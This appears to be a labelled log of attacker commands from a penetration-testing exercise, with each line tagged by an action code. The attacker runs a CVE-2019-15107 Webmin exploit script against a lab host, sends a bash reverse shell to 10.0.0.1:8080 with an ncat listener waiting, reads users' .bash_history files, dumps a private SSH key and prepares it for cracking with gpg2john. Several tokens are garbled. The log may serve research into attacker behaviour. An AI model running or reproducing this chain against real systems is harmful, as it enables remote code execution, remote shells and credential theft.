```
nmap A0 A1
                                         nmap -h A0 A1
  ls A10
                                            ls -la A10
                                             ls A10
                                             ls A10
  python CVE 2019 15107.py https://172.18.1.5:10000 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' A13
  python CVE 2019 15107.py http://172.18.1.5:10000 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' A13
                                 ncat -l 8080 A1 A9 A11 A12 A17
                             sudo apt install neat A1 A9 A11 A12 A17
                                 ncat -l 8080 A1 A9 A11 A12 A17
                                 ncat -i 8080 A1 A9 A11 A12 A17
                                 ncat -l 8080 A1 A9 A11 A12 A17
  python CVE 2019 15107.py http://172.18.1.5:10000 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' A13
                    python CVE_2019_15107.py http://172.18.1.5:10000 'id' A13
            python CVE_2019_15107.py http://172.18.1.5:10000 'cat ./.bash_history' M11
 python CVE 2019 15107.py http://172.18.1.5:10000 'cat home/eva/.bash history' A1 A9 A12 A13 A17
 python CVE 2019 15107.py http://172.18.1.5:10000 'cat home/bob/.bash history' A1 A9 A12 A13 A17
python CVE_2019_15107.py http://172.18.1.5:10000 'cat home/debian/.bash_history' A1 A9 A12 A13 A17
           python CVE_2019_15107.py http://172.18.1.5:10000 'ls home/debian/' A10 A13
           python CVE 2019 15107.py http://172.18.1.5:10000 'ls /home/debian/' A10 A13
                 python CVE 2019 15107.py http://172.18.1.5:10000 'ls -la' A10 A13
             python CVE 2019 15107.py http://172.18.1.5:10000 'cd /home; ls' A10 A13
                                        save user.cgi A4
                                     useradmin_update.pl A4
           python CVE_2019_15107.py http://172.18.1.5:10000 'cd /home ; ls -la' A10 A13
              python CVE 2019 15107.py http://172.18.1.5:10000 'cd /; ls -la' A10 A13
               python CVE 2019 15107.py http://172.18.1.5:10000 'ls /home' A10 A13
            python CVE 2019 15107.py http://172.18.1.5:10000 'ls /home/alice' A10 A13
           python CVE_2019_15107.py http://172.18.1.5:10000 'ls -la /home/alice' A10 A13
          python CVE 2019 15107.py http://172.18.1.5:10000 'ls -la /home/debian' A10 A13
             python CVE 2019 15107.py http://172.18.1.5:10000 'ls -la /home/eve' M10
 python CVE 2019 15107.py http://172.18.1.5:10000 'cat /home/eve/.bash history' A1 A9 A12 A13 A17
                                       cat /etc/services M1
                                   less /etc/services A9 A12 A17
  python CVE 2019 15107.py http://172.18.1.5:10000 'cat /home/bob/.bash history' A9 A12 A13 A17
              python CVE 2019 15107.py http://172.18.1.5:10000 'ls -la /home/bob' A13
  python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/eve/.bash_history' A9 A12 A13 A17
                                       ssh 10.1.18.22 A16
                                        ssh 10.1.17.4 A16
            python CVE_2019_15107.py http://172.18.1.5:10000 'ssh eve@10.1.17.4' M16
       python CVE 2019 15107.py http://172.18.1.5:10000 'cat /home/eve/.ssh' A9 A12 A13 A17
               python CVE 2019 15107.py http://172.18.1.5:10000 'ls /home/eve/' A13
       python CVE 2019 15107.py http://172.18.1.5:10000 'cat /home/eve/.ssh' A9 A12 A13 A17
  python CVE_2019_15107.py http://172.18.1.5:10000 'cat /home/eve/.bash_history' A9 A12 A13 A17
               python CVE 2019 15107.py http://172.18.1.5:10000 'ls /home/eve/' A13
              python CVE 2019 15107.py http://172.18.1.5:10000 'ls -la /home/bob' A13
              python CVE 2019 15107.py http://172.18.1.5:10000 'ls -la /home/eve' A13
           python CVE 2019 15107.py http://172.18.1.5:10000 'ls -la /home/eve/.ssh/' A13
         python CVE 2019 15107.py http://172.18.1.5:10000 'cat /home/eve/.ssh/id rsa' M12
   python CVE 2019 15107.py http://172.18.1.5:10000 'cat /home/eve/.ssh/id rsa.pub' A9 A13 A17
                                     chmod 600 id_rsa M15
                                       gpg2john id_rsa A14
```

0

nmap A0 A1